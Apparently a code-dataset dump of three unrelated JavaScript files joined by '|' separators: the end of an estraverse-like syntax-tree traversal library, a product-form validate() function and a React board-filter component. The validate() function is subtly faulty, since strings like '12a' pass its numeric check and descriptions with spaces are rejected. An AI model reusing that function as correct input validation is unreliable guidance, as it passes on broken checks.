Controller.prototype.skip = function () {
this.notify(SKIP);
};
// API:
// break traversals
Controller.prototype['break'] = function () {
this.notify(BREAK);
};
// API:
// remove node
Controller.prototype.remove = function () {
this.notify(REMOVE);
};
Controller.prototype.__initialize = function(root, visitor) {
this.visitor = visitor;
this.root = root;
this.__worklist = [];
this.__leavelist = [];
this.__current = null;
this.__state = null;
this.__fallback = null;
if (visitor.fallback === 'iteration') {
this.__fallback = objectKeys;
} else if (typeof visitor.fallback === 'function') {
this.__fallback = visitor.fallback;
}
this.__keys = VisitorKeys;
if (visitor.keys) {
this.__keys = extend(objectCreate(this.__keys), visitor.keys);
}
};
function isNode(node) {
if (node == null) {
return false;
}
return typeof node === 'object' && typeof node.type === 'string';
}
function isProperty(nodeType, key) {
return (nodeType === Syntax.ObjectExpression || nodeType === Syntax.ObjectPattern) && 'properties' === key;
}
Controller.prototype.traverse = function traverse(root, visitor) {
var worklist,
leavelist,
element,
node,
nodeType,
ret,
key,
current,
current2,
candidates,
candidate,
sentinel;
this.__initialize(root, visitor);
sentinel = {};
// reference
worklist = this.__worklist;
leavelist = this.__leavelist;
// initialize
worklist.push(new Element(root, null, null, null));
leavelist.push(new Element(null, null, null, null));
while (worklist.length) {
element = worklist.pop();
if (element === sentinel) {
element = leavelist.pop();
ret = this.__execute(visitor.leave, element);
if (this.__state === BREAK || ret === BREAK) {
return;
}
continue;
}
if (element.node) {
ret = this.__execute(visitor.enter, element);
if (this.__state === BREAK || ret === BREAK) {
return;
}
worklist.push(sentinel);
leavelist.push(element);
if (this.__state === SKIP || ret === SKIP) {
continue;
}
node = element.node;
nodeType = node.type || element.wrap;
candidates = this.__keys[nodeType];
if (!candidates) {
if (this.__fallback) {
candidates = this.__fallback(node);
} else {
throw new Error('Unknown node type ' + nodeType + '.');
}
}
current = candidates.length;
while ((current -= 1) >= 0) {
key = candidates[current];
candidate = node[key];
if (!candidate) {
continue;
}
if (isArray(candidate)) {
current2 = candidate.length;
while ((current2 -= 1) >= 0) {
if (!candidate[current2]) {
continue;
}
if (isProperty(nodeType, candidates[current])) {
element = new Element(candidate[current2], [key, current2], 'Property', null);
} else if (isNode(candidate[current2])) {
element = new Element(candidate[current2], [key, current2], null, null);
} else {
continue;
}
worklist.push(element);
}
} else if (isNode(candidate)) {
worklist.push(new Element(candidate, key, null, null));
}
}
}
}
};
Controller.prototype.replace = function replace(root, visitor) {
var worklist,
leavelist,
node,
nodeType,
target,
element,
current,
current2,
candidates,
candidate,
sentinel,
outer,
key;
function removeElem(element) {
var i,
key,
nextElem,
parent;
if (element.ref.remove()) {
// When the reference is an element of an array.
key = element.ref.key;
parent = element.ref.parent;
// If removed from array, then decrease following items' keys.
i = worklist.length;
while (i--) {
nextElem = worklist[i];
if (nextElem.ref && nextElem.ref.parent === parent) {
if (nextElem.ref.key < key) {
break;
}
--nextElem.ref.key;
}
}
}
}
this.__initialize(root, visitor);
sentinel = {};
// reference
worklist = this.__worklist;
leavelist = this.__leavelist;
// initialize
outer = {
root: root
};
element = new Element(root, null, null, new Reference(outer, 'root'));
worklist.push(element);
leavelist.push(element);
while (worklist.length) {
element = worklist.pop();
if (element === sentinel) {
element = leavelist.pop();
target = this.__execute(visitor.leave, element);
// node may be replaced with null,
// so distinguish between undefined and null in this place
if (target !== undefined && target !== BREAK && target !== SKIP && target !== REMOVE) {
// replace
element.ref.replace(target);
}
if (this.__state === REMOVE || target === REMOVE) {
removeElem(element);
}
if (this.__state === BREAK || target === BREAK) {
return outer.root;
}
continue;
}
target = this.__execute(visitor.enter, element);
// node may be replaced with null,
// so distinguish between undefined and null in this place
if (target !== undefined && target !== BREAK && target !== SKIP && target !== REMOVE) {
// replace
element.ref.replace(target);
element.node = target;
}
if (this.__state === REMOVE || target === REMOVE) {
removeElem(element);
element.node = null;
}
if (this.__state === BREAK || target === BREAK) {
return outer.root;
}
// node may be null
node = element.node;
if (!node) {
continue;
}
worklist.push(sentinel);
leavelist.push(element);
if (this.__state === SKIP || target === SKIP) {
continue;
}
nodeType = node.type || element.wrap;
candidates = this.__keys[nodeType];
if (!candidates) {
if (this.__fallback) {
candidates = this.__fallback(node);
} else {
throw new Error('Unknown node type ' + nodeType + '.');
}
}
current = candidates.length;
while ((current -= 1) >= 0) {
key = candidates[current];
candidate = node[key];
if (!candidate) {
continue;
}
if (isArray(candidate)) {
current2 = candidate.length;
while ((current2 -= 1) >= 0) {
if (!candidate[current2]) {
continue;
}
if (isProperty(nodeType, candidates[current])) {
element = new Element(candidate[current2], [key, current2], 'Property', new Reference(candidate, current2));
} else if (isNode(candidate[current2])) {
element = new Element(candidate[current2], [key, current2], null, new Reference(candidate, current2));
} else {
continue;
}
worklist.push(element);
}
} else if (isNode(candidate)) {
worklist.push(new Element(candidate, key, null, new Reference(node, key)));
}
}
}
return outer.root;
};
function traverse(root, visitor) {
var controller = new Controller();
return controller.traverse(root, visitor);
}
function replace(root, visitor) {
var controller = new Controller();
return controller.replace(root, visitor);
}
function extendCommentRange(comment, tokens) {
var target;
target = upperBound(tokens, function search(token) {
return token.range[0] > comment.range[0];
});
comment.extendedRange = [comment.range[0], comment.range[1]];
if (target !== tokens.length) {
comment.extendedRange[1] = tokens[target].range[0];
}
target -= 1;
if (target >= 0) {
comment.extendedRange[0] = tokens[target].range[1];
}
return comment;
}
function attachComments(tree, providedComments, tokens) {
// At first, we should calculate extended comment ranges.
var comments = [], comment, len, i, cursor;
if (!tree.range) {
throw new Error('attachComments needs range information');
}
// tokens array is empty, we attach comments to tree as 'leadingComments'
if (!tokens.length) {
if (providedComments.length) {
for (i = 0, len = providedComments.length; i < len; i += 1) {
comment = deepCopy(providedComments[i]);
comment.extendedRange = [0, tree.range[0]];
comments.push(comment);
}
tree.leadingComments = comments;
}
return tree;
}
for (i = 0, len = providedComments.length; i < len; i += 1) {
comments.push(extendCommentRange(deepCopy(providedComments[i]), tokens));
}
// This is based on John Freeman's implementation.
cursor = 0;
traverse(tree, {
enter: function (node) {
var comment;
while (cursor < comments.length) {
comment = comments[cursor];
if (comment.extendedRange[1] > node.range[0]) {
break;
}
if (comment.extendedRange[1] === node.range[0]) {
if (!node.leadingComments) {
node.leadingComments = [];
}
node.leadingComments.push(comment);
comments.splice(cursor, 1);
} else {
cursor += 1;
}
}
// already out of owned node
if (cursor === comments.length) {
return VisitorOption.Break;
}
if (comments[cursor].extendedRange[0] > node.range[1]) {
return VisitorOption.Skip;
}
}
});
cursor = 0;
traverse(tree, {
leave: function (node) {
var comment;
while (cursor < comments.length) {
comment = comments[cursor];
if (node.range[1] < comment.extendedRange[0]) {
break;
}
if (node.range[1] === comment.extendedRange[0]) {
if (!node.trailingComments) {
node.trailingComments = [];
}
node.trailingComments.push(comment);
comments.splice(cursor, 1);
} else {
cursor += 1;
}
}
// already out of owned node
if (cursor === comments.length) {
return VisitorOption.Break;
}
if (comments[cursor].extendedRange[0] > node.range[1]) {
return VisitorOption.Skip;
}
}
});
return tree;
}
exports.version = require('./package.json').version;
exports.Syntax = Syntax;
exports.traverse = traverse;
exports.replace = replace;
exports.attachComments = attachComments;
exports.VisitorKeys = VisitorKeys;
exports.VisitorOption = VisitorOption;
exports.Controller = Controller;
exports.cloneEnvironment = function () { return clone({}); };
return exports;
}(exports));
/* vim: set sw=4 ts=4 et tw=80 : */
|
function validate() {
var product_name = document.getElementById("product_name").value;
var quantity = document.getElementById("quantity").value;
var price = document.getElementById("price").value;
var description = document.getElementById("description").value;
var alpha = /^[A-Za-z]+$/; //regular expression for alphabet characters
if (product_name == "" || quantity == "" || price == "" || description ==""){
alert("Leave no fields empty");
return false;
}
else if (alpha.test(product_name) == false || alpha.test(description) == false){
alert("Only use words and letters for name and description");
return false;
}
else if (alpha.test(quantity) || alpha.test(price)) {
alert("Only use numbers for quantity and price");
return false;
}
else return true;
}
|
import React from 'react';
import { InputSelect } from 'aionic-library';
import Helper from '../../../services/helper';
const BoardsFilters = (props) => {
const { filterItemsByParams, filterItemsByText, resetFilters } = props;
const handleParamsChange = (e) => {
filterItemsByParams({ [e.target.name]: e.target.value });
};
const handleFilterChange = (e) => {
filterItemsByText(e.target.value);
};
const { sortDirections, resultLimits } = Helper.getFilterLists();
const orderByList = [
{ value: '', title: 'Order by' },
{ value: 'created', title: 'Created' },
{ value: 'title', title: 'Title' },
{ value: 'updated', title: 'Updated' }
];
return (
<div className="BoardsFilters">
<form>
<div className="row">
<div className="col-12 col-xl">
<div className="form-group">
<input
type="text"
className="form-control"
placeholder="Filter..."
onChange={handleFilterChange}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="input-group form-group">
<InputSelect
name="orderby"
onChange={handleParamsChange}
optionList={orderByList}
showDefault={false}
/>
<InputSelect
name="orderdir"
classes={['ml-2']}
onChange={handleParamsChange}
optionList={sortDirections}
showDefault={false}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="form-group">
<InputSelect
name="limit"
onChange={handleParamsChange}
optionList={resultLimits}
showDefault={false}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="form-group">
<button
type="reset"
className="button button-warning btn-block"
onClick={resetFilters}
>
Reset
</button>
</div>
</div>
</div>
</form>
</div>
);
};
export default BoardsFilters;
|
Subsets and Splits